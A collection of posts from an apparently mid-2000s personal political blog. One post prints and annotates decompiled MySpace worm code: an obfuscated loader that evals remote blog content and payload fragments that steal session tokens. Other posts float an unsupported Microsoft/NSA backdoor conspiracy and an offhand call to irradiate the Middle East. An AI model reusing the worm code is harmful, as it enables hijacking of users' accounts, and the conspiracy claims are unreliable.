Alberto Gonzales has already threatened federal judges to shut up and not question Bush’s authority on the torture of detainees.

“No court, justice, or judge shall have jurisdiction to hear or consider any claim or cause of action whatsoever, including any action pending on or filed after the date of the enactment of the Military Commissions Act of 2006, relating to the prosecution, trial, or judgment of a military commission under this chapter, including challenges to the lawfulness of procedures of military commissions under this chapter.”

The Bush administration is preemptively overriding any challenge to the legislation by the Supreme Court.

It's worse than I could possibly have imagined. Rome’s port at Ostia was set on fire, the consular war fleet destroyed, and two prominent senators, together with their bodyguards and staff, kidnapped.

The incident, dramatic though it was, has not attracted much attention from modern historians. But history is mutable. An event that was merely a footnote five years ago has now, in our post-9/11 world, assumed a fresh and ominous significance. For in the panicky aftermath of the attack, the Roman people made decisions that set them on the path to the destruction of their Constitution, their democracy and their liberty. One cannot help wondering if history is repeating itself.

9/11 will not be remembered for what happened on that fateful day, but what followed as the American people surrendured the constitutuion to "Nero". The "Second 9/11" The following years of dictatorship that almost caused this country to fall apart.

If we can not learn from the mistakes of the past, we are doomed to repeat them.

OMG. MID-TERM ELECTIONS!

omg, OMG, OMG!

Mid-term elections are only six weeks away; you now have permission to freak out.

Immigrants are taking over

Iraq      is falling apart

The world is going to hell

The first two are pretty much the only issues that people have been screeching about so far, ignoring other things like the abuse of executive power and new levels of authoritarian control, progress in the "war on terror", and how we are going to deal with global warming (not just in the next 4 years).

First of all, I could care less if immigrants were "taking over" Republicans say that they are stressing the schools, healthcare system and other social services, but that is simply not true, they have not been adding stress to the system, only population growth. They want to build a fence across the border, but no solution can be reached unless a compromise has both plans for a fence AND an easier way to come into this country legally. We need a new approach to how we deal with immigration. We are a country of immigrants. We all came here one way or another. This country was built on the backs of immigrants, and immigrants are what make this country strong. We need to change our attitudes towards immigration with an open door policy that anyone can come if they are willing to work hard, get ahead, and make this great country a better place.

Iraq is falling apart, but the Democrats don't have any better ideas of what to do than change who's in power. Some have suggested that we spilt Iraq into three semi autonomous regions or even into seperate countries entirely. The catch with that is the Sunni's would freak out if Iraq was spilt. They have a majority in the middle of the country, where there is no oil, unlike the shi'a in the south and the Kurds in the north. Right now if we do nothing the civil war will become obvious to everyone. This administartion has been lying about casualties and the progress in Iraq sibce the invasion. In Vietnam independent journalists had photographs of what was really happening, but now we are kept in the dark. Out of sight, out of mind; any news about the war is bad for the republicans. If we do split up Iraq, there will be a civil war anyway, but possibly worse, because it won't just be terrorists groups fighting each other, it will be conventional warfare with real armies fighting each other. More than 100,000 Iraqi's have already died as a result of the invasion and the secterian violence following, how many more innocent lives do we have to kill before this all stops?

The world isn't really going to hell, but it sure feels like it sometimes, especially right now. Bush's Cabinet will be known for centuries afterwards as the ones who seriously fucked things up for all of us.

There are many more important things those talking heads on campaign ads could be screaming about. Executive power has reached an all-time high in one of the most dangerous presidents of all time. I can not begin to describe my horror of his abuse of executive power, it disgusts me so, and shows a new level of apathy in our society like we have not seen before. Progress in the "War on terror" is now in doubt, especially after the recent NIE report that the war in Iraq has actually made us less safe. (Well, tell me something I didn't know!) Also, the resistance movement in Afghanistan has been growing in strength and may soon threaten to become another Iraq, and another un-winnable conflict. Global warming: mark my words, you will tell your grandchildren that you remember when polar bears used to be around. The evidence is now undeniable, see for yourself at IPY.org (International Polar Year). If you still think that global warming is a myth, you are in complete denial. I can understand not wanting to believe it, I don't want cataclysmic change either, but you can no longer duck your head under the sand.

This year, people are upset enough at the republicans that the democrats will most likely pick up a bunch of seats, but not enough to get a majority, or just enough to get a small majority in the senate, putting everyone in limbo.

<link rel='alternate' type='text/html' href='http://theangryeye.blogspot.com/2006/09/omg-mid-term-elections.html' title='OMG. type='text'>Myspace SWF redirect exploit worm

SWEET! Everyone on Myspace is a tool. ALways were and will be moreso in the future. I am NOT apologizing for that. NO. Mysapce was actually started by spammers as a way to easily data mine. Anyway, that is not what i am going to talk about. Myspace just got hit by a nifty little .SWF flash redirect exploit worm. **Note. I didn't make it. "darn"**

How the myspace SWF hack worked

First note: I DID NOT MAKE THE HACK. I simply downloaded the .swf's, decompiled them, looked at the actionscript, worked out what it did, found the Javascript that it uses, and tidied it up & commented it. I've probably got some bits wrong, feel free to contact me and I'll update this page

When you visited an already infected page, there was an SWF embedded ("redirect.swf") which contained the actionscript:

getURL("http://editprofile.myspace.com/index.cfm?fuseaction=blog.view&friend
ID=93634373
&blogID=144877075", "_self");

Which is pretty self explanatory - it opened the blog URL which you got redirected to.

On the blog url which you got redirected to, there was another SWF embedded, called "retrievecookie.swf". This contained:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace
.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.
onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\'
\')!=-1)||(sc.indexOf(\'-XXX\')!=-1)){var n=sc.indexOf(\'
\');if(n==-1)n=sc.indexOf(\'-XXX\');sc=sc.substring(0,n)+sc.substring(n+5,sc.length)
;};" + "eval(sc);}};" + "x.send(null);", "");

Which looks pretty obfuscated, however, when you space it out and add comments:

getURL("
javas\n\r
cript:
//this translates in the browser to: "javascript:"
//which myspace really should have blocked now.
var x = new ActiveXObject(\'Msxml2.XMLHTTP\');
// loads a new xmlHTTP object, sets it as var "x"
x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeC
omments&friendID=93634373\',true);
// This opens yet another blog post, at the URL above. The text of the URL is below
x.onreadystatechange = function()
// when the readystate of the xmlHTTP object changes:
{
if (x.readyState==4)
// once the state changes to complete (it goes from 0 to 4, iirc)
{
var pg = x.responseText;
// the code it got from the page
var sc = pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));
// loads into "sc" the contents of the response text from the place where
// the end of "BX-" (that's the +3) is first encountered up until it finds the start of
// "-EX", this is all the nasty JS.
while ( (sc.indexOf(\'
\')!=-1) || (sc.indexOf(\'-XXX\')!=-1) )
// while "sc" (the code) doesn't contain "
" or "-XXX" then:
{
var n=sc.indexOf(\'
\');
// n is the start of where it finds "
" in "sc"
if (n==-1)
n=sc.indexOf(\'-XXX\');
// if it cant find "
, then make n where it can find "-XXX"

// thist bit next was really quite clever, it manages to keep the > closing bracket for
// the embed tag, which it needs, and creates the embed tag by removing
// XXX's and leaving the final character!
sc = sc.substring(0,n)+sc.substring(n+5,sc.length);
// sc is now from the start, to n.
// then add on to sc the bit from n+5 to the end of sc,
// essentially, this cuts out the crap from the blog post it pull.
// the crap was in there in the first place to get past myspace's filters, I presume.
};
// this iterates through and removes the -XXX's from the blog post
" + "eval(sc);
// evaluate "sc" - this is what does it all.
} // end of readystate==4 "if"
}; //end of function
" //closing the quote from the SWF getURL() function
+
"
x.send(null);
// adds on sending "null" to the xmlHTTP object.
", ""
// no target, so it just executes.
);// end of SWF getURL function.

In essence, it pulls a blog post from somewhere else on myspace, and evaluates the code that it contains.

This is the post:

BX-var msg='-XXXX<-XXX     XE-XXXXM-XXXXB-XXXXE-XXXXD-XXXX src="http://i105.photobucket.com/albums/m225/yrkblack/redirect.swf">BY SPAIRLKAIFS';function paramsToString(AV){ var N=new String(); var O=0; for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){ Q=Q.replace('+', '%2B')}while(Q.indexOf('&')!=-1){ Q=Q.replace('&amp;amp;amp;amp;', '%26')}N+=P+'='+Q;O++ } return N};function getToken(page){ var start = page.indexOf('Mytoken='); token = page.substring(start+8, start+8+36); return token;};function getHashCode(page){ var start = page.indexOf

Props to Kinematic for Digging this (digg.com)

For those of you not "in" to reading code, I will explain what this basically means. When you are signed in to myspace and go to an infected profile, It infects your profile and sends you to a site with conspiracy theories about how bush knew about 9/11. (not that they aren't true)

Fixing this is going to be almost impossible except block all flash content. It will be interesting to see how they deal with this. This is only the first of many, many, Myspace explots. Just because of how it operates using URL's it is so easy to do things to people. You could edit this code so that everyone who saw your profile would add you as a friend, or compltley delete their profile... the possibilites are endless! (for other people, that is. heh, heh)

SCIENCE CAMP!

Yay! this time i get to go to science camp, where I will take the web design class. This is about what goes through my head every time a politician says Hydrogen
EVERY Time I hear someone talk about alteratives to oil and say the word "hydrogen" I want to scream and rip their fucking head off.

Well, I don't know about ripping their fucking head off, but I certainly want to embarrass them by standing up and screaming at them, Then explain to everyone around me what a moron they are. Hydrogen can not be an energy source. There is NO abundant source of raw H2 anywhere on earth.

When I informed a member of our State House about this (At Boy's State) He looked my in the eye and said,(showing his superior knowledge of chemistry)

"Hydrogen is the most abundant element in the Universe." "...Well, we got a great big ocean made out of H2O..."

In case you didn't already know, electricity is gotten out of fuel cells by reacting hydrogen and oxygen across a membrane. In order to GET hydrogen in the first place, you either need to find the gas, which there is none, or get it from water using electrolysis (which takes electricity). There is no place where we can find hydrogen, wew either have to use energy to get it or waste energy taking it from hydrocarbons. Saying that we are going to rely upon hydrogen is like saying that we are going meet future energy needs with Batteries... they are trying to break the First and Second laws of Thermodynamics with this one.

So the next time someone says the magic word hyrdogen jump to action, Kicking and screaming and say "NO, NO, NO! You IDIOT!"

I KNOW I'M STILL ANGRY, ARE YOU?

Bolgsphere, Rejoice!

YES, YES, YES!... Everything that we could ever want to argue about right there. I was wrong. Boy’s State was actually really fun. It was “conservative” but very good. Then we headed to a legislative session, where we did bills and resolutions and argued stuff out. The cool thing about this was, that once they passed both the house and the senate and was signed by the governor we elected there, they were taken by the Lt. Well, actually I should say that there was a prayer only once or twice, I just sort of stared at my feet while they rambled.

We had a really nice lake where we were at and played paddlepirates all the time, flipping canoes and getting resced by paddle boats.

The Lake. very nice place. I’M Going to Summer Fascist Camp!

That’s right; I am going to the American Legion’s Boy’s State camp. No doubt about the fact that the American Legion is a Fascist Organization. Not to be saying that there is anything wrong with Fascism, but they’re logo is “For God and Country”.. That sends the impression that they may not like your kind if you happen to be Jewish (which I am not). Here is a picture of consenting Boy’s State Citizens become brainwashed in the “American Way of life”

You know, The American Way of accepting JESUS CHRIST as your PERSONAL savior and for reading the Bible as the true word of god! God Bless The American Way of life, The one with out any gays, Jews, Muslims, or Atheist’s, The one where I commute to work in my F-350 Pickup with my gun rack on the back and so forth…. Become a Republican

I am pretty sure there is some Benefit in Going, Otherwise I wouldn't be going. I am however really sure that the camp will be full of Godamn bible thumpers... maybe. I know there is going to be at least on other liberal there beside me. I have a good feeling that unless I keep my mouth shut the whole time... I'm not going to get along there *surprise, surprise*. I am debating whether or not to bring my Che Guevera Shirt but I know for sure that I will bring a journal so I can tell you all about the fun that I had a Fascist Camp when I get back. 15 Minutes after we wake up we go to "Morning Calisthenics". WTF?! There is nothing wrong with a morning jog (which i should do more often), but It sounds like this could be more like boot camp than a Leadership Conference.

Now, I’m pretty sure that this may be a positive experience for me overall; otherwise I wouldn’t have decided to go. It sounds really cool (the whole mock government thing) but it’s what outside of our duties as Mayor and whatnot that really frighten me.

  BOOT CAMP, HERE I COME!

See Boy's State  debriefing

The Iran crisis

Mostly, the whole Iran "crisis" (as it may become) is all completely overblown. Since the beginning I have been disappointed that someone didn’t come in and hold their hand so they could develop nuclear weapons for peaceful purposes only. The whole reason why they want them in the first place I first and foremost a power issue. Iran wants to play with the big dogs and become a world power. You can hardly blame them, what else would you do if you tried to be a forward thinking country?

Of course, there may be other benefits as well, if Iran did get nuclear weapons; they would not constantly being threatened by the prospect of a US “regime change” on them. Currently, Iran has several hundred centrifuges, which is enough to make fuel grade uranium. In order to make weapons grade uranium, they would need five times as many as they currently have.

The whole “air strike threat” is a bunch of bull. I could see this administration making the decision to destroy nuclear facilities with conventional weapons, but the nuclear option is far-flung. The defense department was criticized for “planning to nuke” Iran, but I defend them in this case. In their current job description, what else is the pentagon supposed to do but plan for every possible scenario? They are still stuck in the cold war and because of that are always planning for every possible contingency. I believe that it was a leak to the press just to make Iran feel really nervous, using the same scare tactics that this administration always uses while “negotiating”. Either that, or It was made by someone who wants to point out how stupid this whole things is, but judging by this administrations reaction, I would say that it was the first, because there have not been any white house plumbers running around trying to find out who leaked about the secret spying program. Speaking of which, this story gets that one off of the front page, an added bonus.

To conclude, I think Bush would confirm himself as being a bully and an asshole if he did go ahead with the air strikes on Iran (the conventional ones). I don’t put my name on my blog for a reason, this is one of them: if Iran was attacked for this I would agree with them being fully justified on making a counterattack against US forces in Iraq and Afghanistan, as well as perhaps aiding the Insurgency there. I say this not because I think it should be done, but because they should not let us push them around like that. Iran is asserting itself as it is just by building the nuclear reactors; let’s just hope they aren’t forced to assert themselves anymore than that.

Firefox Flicks

This is my favorite video :)

Game Review: A Force More Powerful

I have never done a game review before, and i am doubtful i will ever do one again, but A Force More Powerful is not something you want to miss.

Can a computer game teach how to fight real-world adversaries—dictators, military occupiers and corrupt rulers, using methods that have succeeded in actual conflicts—not with laser rays or AK47s, but with non-military strategies and nonviolent weapons? Such a game, A Force More Powerful (AFMP), is now available. A unique collaboration of experts on nonviolent conflict working with veteran game designers has developed a simulation game that teaches the strategy of nonviolent conflict. A dozen scenarios, inspired by recent history, include conflicts against dictators, occupiers, colonizers and corrupt regimes, as well as struggles to secure the political and human rights of ethnic and racial minorities and women.

A Force More Powerful is the first and only game to teach the waging of conflict using nonviolent methods. Destined for use by activists and leaders of nonviolent resistance and opposition movements, the game will also educate the media and general public on the potential of nonviolent action and serve as a simulation tool for academic studies of nonviolent resistance.

I have been playing this game for about three weeks now, and it is very addicting and fun. The actual game play is not spectacular, since you just do the planning for your movement; there is little action involved unless there is a mass protest. The game can be slow, because campaigns might often take years to accomplish (sim time) but it is very rewarding when you win. Many people from all over the world have modified the game to meet their own country and area's settings. This is one game really makes you want to get out there on the street and do something. This game is also related to a movie and book by the same name.

NOW GET OUT THERE AND FIGHT THE MACHINE!

more Socialism?

Since my last post on defining Socialist-Libertarianism I have done a lot of thinking about what I really am, and now more certainly than ever I am sure I have absolutely no idea. I guess you could just call me liberal..?

Recently, the Massachusetts legislature passed a law that required all residents to have health insurance. Free healthcare is one of the defining parts of a socialist state, and is seen in Canada, The Netherlands, Europe in general, ECT. So the question is, Is Massachusetts taking a step towards becoming socialist? I guess I should be excited about this, and in a way it's interesting, but at the same time it’s scary. All residents are required to have health insurance with private companies is not exactly the same as the concept of government healthcare, and may turn out to be a complete failure. They claimed that it would actually lower the cost of health care. In a way it makes sense, but in others it doesn't. It makes sense that if an illness such a strep-throat is treated sooner it will be cheaper to treat than one of the more serious complications when left untreated. They also say it will be cheaper because the uninsured’s medical bills are “paid for with public funds.” Massachusetts isn't the only state to have a program similiar to this, both Maine and Hawaii try to have almost universal health care but they took it a step futher by making it a requirment.

WAIT a second. Wouldn’t these insurance subsidies be paid for with public funds anyway? I’m not saying that this plan isn’t a good thing, but giving subsidies to insurance companies scares me. The plan gives the insurance companies subsidies so they can lower rates for those in lower income levels. If you are going to provide free Health care for everyone, do it right and don’t let the insurance company’s make money off of the program! I have always thought that insurance is a public service that should never be owned by a private company, like utilities and oil… but that’s another story…

Defining Socialist-Libertarianism

Recently while looking for other sites with my same political attitudes and bad-ass coolness I googled: Socialist Libertarian. I was shocked at what I found; it does not seem that I am quite like what I found, so I am attempting to re-define it as a true philosophy. The philosophy, and this post may take a long time to perfect, so if it is not finished be patient! Eventually I may have a manifesto…

My Theory of Socialist-Libertarianism incorporates the economic benefits of Socialism and the personal freedoms of Libertarianism; you could almost call it Anti-Fascism. The way it works is that the purpose of government is to guarantee the protection of Life, Liberty and Property, with special exceptions on regarding property. Private property will not be abolished, but it will be the companies and corporations that will all be (partially) publicly owned, so that the company may never become abusive to the people. You may ask, how could this happen? It would make everything so chaotic and would be part of the reason that a true democracy is not possible in a world with large populations. In a way it would be a true democracy; all parts of government elected by popular vote, where business and corporations are also held to the same standard. Mass voting can be achieved in today’s modern world through the internet. I am not doing away with Capitalism, because the companies will still be privately owned, and will allow for the accumulation of wealth within the company, however it will not be shareholders, calling the shots, eliminating the upper-class from screwing over everyone else and filling their pockets at the same time.

I would suggest that the actual government work on the American system, which has a very effective method of checks and balances; also there should be minimum voter turnout (which should not be needed with internet voting). Unlike the Libertarian government, I am not making the government be smaller. In fact it would be extremely hard for a small government to get anything done. From my liberal background, I would like to see the government and mass populous be liberal in their thinking; however I know this may not be possible.

When everything is broken down, it is simply giving people the power to manage the large corporations that have a huge impact on their lives. It is very similar to CO-OPing everything. This whole theory may take sometime to perfect. If it ends up being the people who make unreasonable demands of companies, than it would be the court that steps in. Remember that all voting is optional, so if an out of the way company will only be affected by people who care about it.

Please, If there is anything I have missed, tell me! Lave your thoughts here so I can perfect my theoretical system that may lead to a (dare I say utopia?) better system..

Alternative Energy

"America is addicted to oil" - George W Bush

When I heard this I was first of all shocked and surprised that the good friend of Exxon and the Saudi Royal family had really said this. I thought, 'is this the George Dubya Bush I know?’
Politics aside, it was interesting that he did mention alternative energy resources. The one thing that will always bother me when politicians talk about alternative energy is how wrong they always are. In particular Bush mentioned ethanol, fuel cells "hydrogen", and nuclear power.
The first problem is ethanol. It is a new, organic source of fuel that is extracted from organic material. In 2004 John Kerry talked about this on the campaign trail while Bush was talking about ANWR. I think it could be a useful addition to gasoline, but there are major problems with it. Have you ever heard the thing that if everyone in the world lived like an American, we would need something like three more planets? Well, if every car in the world used pure ethanol, we would need three more planets just to grow all the corn! Plus, Corn turns out to be a very inefficient way of producing ethanol. It will be a useful fuel additive, but we will never be able to use it entirely for fuel.
"Hydrogen"... please people, do yourself a favor and become educated. Fuel cells work on the technology of combining hydrogen and oxygen in a controlled reaction that produces electricity. Fuel cell technologies are useful and may soon be applied in many, many areas, however it has one really, really big problem. Where is all the hydrogen? There is NO source of hydrogen where we could get any of it. The only practical source of hydrogen is water, which would take energy to separate the Hydrogen and oxygen. There are two ways to do this, and both are ironic. One method of separating them is to use coal or nuclear power to “manufacture” hydrogen. Stupid. Obviously whoever thought that it could be a good idea wasn’t thinking about what the purpose of fuel cells were. The other way to extract hydrogen from the water would be what shell had used in a few experimental “hydrogen gas stations” that use solar power. Not as bad as the idea of wasting other precious resources for it, but not as practical as it could be. Hopefully solar farms for hydrogen will never become large or big business, because then we will start running out of space on earth and begin cooling it.

This is my Idea for perfecting our wasting of precious energy:
Oil is a valuable resource. We are stupid to waste a thing like that on things like cars, when really we should save it for things that can not use alternative fuel yet, like planes, heavy trucks, trains, and cargo ships. (When I say heavy trucks, I’m not referring to the “light trucks” and SUV’s that soccer mom’s drive.) We have everything that we need to make efficient cars.
Hybrids are simply genius. They could also be improved by adding lightweight or painted solar panels to improve their energy efficiency. Super-efficient diesels are also here. In Britain, a modified version of small car with a super-efficient diesel got 120 mpg! (don’t have a link, sry) Manufactures also have many, many ideas that may soon become very practical in improving engine efficiency. One idea is using the hot exhaust gas and a heat engine to provide more energy for the car. Gas taxes could easily force companies and consumers into these, but the sad thing is how it’s not being done.

We have the tools we need, yet we refuse to use them.

State of the Union and Osama Bin Laden

Just Last night, President Bush Gave his Fifth State Of the Union Address. As was predicted, the sixth year is the troubled one for presidents. Right on Cue he talked about foreign policy ,and the especially strong rhetoric of "second guessing isn't a strategy". This actually seems like an extremely good argument to his target audience, however his polls remain low.

But i didn't write this post to talk about the state of the union. I wanted to compare his State of the Union Address, with Osama bin ladens new videotape released in January. here is the full transcript of Osama Bin Laden's 'speech to the american people'.

You, the American people, I talk to you today about the best way to avoid another catastrophe and about war, its reasons and its consequences.

And in that regard, I say to you that security is an important pillar of human life, and that free people do not compromise their security.

Contrary to what [President George W.] Bush says and claims -- that we hate freedom --let him tell us then, "Why did we not attack Sweden?" It is known that those who hate freedom don't have souls with integrity, like the souls of those 19. May the mercy of God be upon them.

We fought with you because we are free, and we don't put up with transgressions. We want to reclaim our nation. As you spoil our security, we will do so to you.

I wonder about you. Although we are ushering the fourth year after 9/11, Bush is still exercising confusion and misleading you and not telling you the true reason. Therefore, the motivations are still there for what happened to be repeated.

And I will talk to you about the reason for those events, and I will be honest with you about the moments the decision was made so that you can ponder. And I tell you, God only knows, that we never had the intentions to destroy the towers.

But after the injustice was so much and we saw transgressions and the coalition between Americans and the Israelis against our people in Palestine and Lebanon, it occurred to my mind that we deal with the towers. And these special events that directly and personally affected me go back to 1982 and what happened when America gave permission for Israel to invade Lebanon. And assistance was given by the American sixth fleet.

During those crucial moments, my mind was thinking about many things that are hard to describe. But they produced a feeling to refuse and reject injustice, and I had determination to punish the transgressors.

And as I was looking at those towers that were destroyed in Lebanon, it occurred to me that we have to punish the transgressor with the same -- and that we had to destroy the towers in America so that they taste what we tasted, and they stop killing our women and children.

We found no difficulties in dealing with the Bush administration, because of the similarities of that administration and the regimes in our countries, half of which are run by the military and half of which are run by monarchs. And our experience is vast with them.

And those two kinds are full of arrogance and taking money illegally.

The resemblance started when [former President George H.W.] Bush, the father, visited the area, when some of our own were impressed by America and were hoping that the visits would affect and influence our countries.

Then, what happened was that he was impressed by the monarchies and the military regimes, and he was jealous of them staying in power for tens of years, embezzling the public money without any accountability. And he moved the tyranny and suppression of freedom to his own country, and they called it the Patriot Act, under the disguise of fighting terrorism. And Bush, the father, found it good to install his children as governors and leaders.

We agreed with the leader of the group, Mohammed Atta, to perform all attacks within 20 minutes before [President George W.] Bush and his administration were aware of what was going on. And we never knew that the commander-in-chief of the American armed forces would leave 50,000 of his people in the two towers to face those events by themselves when they were in the most urgent need of their leader.

He was more interested in listening to the child's story about the goat rather than worry about what was happening to the towers. So, we had three times the time necessary to accomplish the events.

Your security is not in the hands of [Democratic presidential nominee John] Kerry or Bush or al Qaeda. Your security is in your own hands. Any nation that does not attack us will not be attacked.

If anything, Bin Laden's speech makes you think and it actually reinforces what i have been thinking for years... Stop Pissin' people off! Make no doubt about it, Osama is messed up; He is a radical, violent, extremist. When Compared to Bush, the similararities are quite disturbing. the only difference other than religion is that Bush is not violent by nature in the way Bin Laden is. They are both religious fanatics who are crusading for what they believe to be right, and both have had a privilaged past, and are quite wealthy. In that way i am sure that that Osama actually shares a connection with bush much in the way sworn enemies sometimes respect each other. The only difference is that they have NO respect for one another when they probably should. I repeat, I still think Bin Laden is a bad guy here.
Back to where I was about upsetting radical extremists. we need to stop acting like Israel is a victim and realize that both sides are wrong, supporting neither. Occasionally I feel that the best option for complete and total peace may be the complete and total destruction of the entire area, and made so radioactive that anyone who goes there will die withing hours. not to panic anyone, but I am just saying that maybe both sides should be DESTROYED
Bush is now finding himself in a curious position ("more and more curiouser")in Iraq, and especially the recent elections in Palestine. He spread democracy, and democracy worked. Unfortunatley for him the majority ruled as Hamas won the elctions. In Iraq we find ourselves at the breaking point of a civil war. If we don't get out before it starts, we will be literally 'stuck' there for the next ten years. We have already had the chance to set a timetable to leave when the Iraqi government asked us to leave.
i was no at all surpised with Bush's state of the union adress. i have benn listening to his mumblings for five years now and i know exactly what he was going to say, except the "addicted to oil part". but that will have to wait for another day.

ANGER_OUT

Firefox and Me

I will admit that so far this whole blog has been leaning heavily towards my general tech rants and why people should get firefox, however I have decided that i will try to no longer focus on this area. A week Later Steve Gibson said that in fact it really didn't require those paticular conditions he had talked about to trigger the exploit. It was wrong, but I still think it was a fun conspiracy theory :). There are some things that this simply does not change, however. Microsoft is still the scum of the earth and they certainly don't deserve your money. I know how hard it is to survive in todays world without windows, and I admit that I too, am forced to use their operating system. But the next time you need to write something, think about all the free alternatives out there. Also think about yourself, and stop using that wretched internet browser known as Internet Explorer. Do yourself a favor, and use something else.

Alternatives to Microsoft Word:
Open Office
Writely

Alternatives To Internet Explorer (a must):
Firefox
other browsers

If there is anything I forgot or any open source software that should be mentioned, Don't Hesitate to leave a comment and a plug.

Microsoft and the NSA

    I'm sure many of you have heard about this new "exploit" in windows regarding the way they handle metafiles. Then again, maybe you haven't, it allows a windows metafile image to run code on your computer; in a sense, to do anything as if they had physical access to it and administrator privileges. This all occurred if you simply looked at a specially crafted image. A week ago it was patched for newer versions only, even though they said that it had affected them.
To get straight to the point, the way that this vulnerability was made there was no way that it could have been an accident, or just badly designed. Microsoft intentionally put a backdoor in windows. For what purposes we know not.
Steve Gibson, a security expert (aka "white hat hacker" or "good guy"), of "Security Now!" was doing research into fixing the vulnerability for earlier versions, when he realized that there was NO way it could have been an accident and that Microsoft, possibly at a high level, knew of this for many years, since the year 2000 or earlier. The way it is done is that you make a slight change to the beginning of the metafile, (i won't go into full details on this), and then make an error abort, it will jump to the next byte and begin executing it, no matter what it is.
I have done no research about this conspiracy theory, but there is evidence that may bring some of this to light. Steve Gibson himself discounted the NSA because for this backdoor you need to visit a webpage to exploit it, but there may be many, many more backdoors out there that make up for this.
Back in the 80's, when Microsoft made its rise to power and suckered IBM into signing away that Microsoft would be put on every IBM computer, I still find it hard to believe that they may have done that willingly. What I’m suggesting is Microsoft is the NSA's bitch, and that they have been guiding them towards success for the last 20 years, using Microsoft for all of their intelligence gathering needs. They wouldn't need to break any RSA keys, crack anything, cause there were back doors straight into the systems of nearly every computer being used. It makes so much sense that Microsoft has had help in their rise to power all these years...
We may be just breaking the tip of the iceberg as we discover that we are not safe from prying eyes.
I will update when i can...

More ANGER!

It is ridiculous that after President Bush was caught with his pants down spying on american citizens, the only thing any bigwigs in washington can think to do is find out who leaked the information to the press... both sad and sickening at the same time, they want to find out who told the public that they were breaking the law....

THE ANGRY!

For a while my friends have been telling me to get a blog so i can share my mantra with the rest of the world. After seeing the jews for jesus blog i decided that that was enough and i had to post an angry post denouncing all forms of religion..

I could not agree more, as a matter of fact, all religious organizations are just a form of control... that is where they came from, an empror thought maybe he could better control his subjects if he convinced them he was a deity and that if they did not worship him they would be sent to "hell". Everything is a scare tatic, so the next time someone asks you if your saved, tell them to read the bible themselves and ask all of the things they do wrong... human beings are such hippocrites..

This is my mantra.. There shall be no forms of control, oppression, or greed untouched.. this is my stand, here me roar!
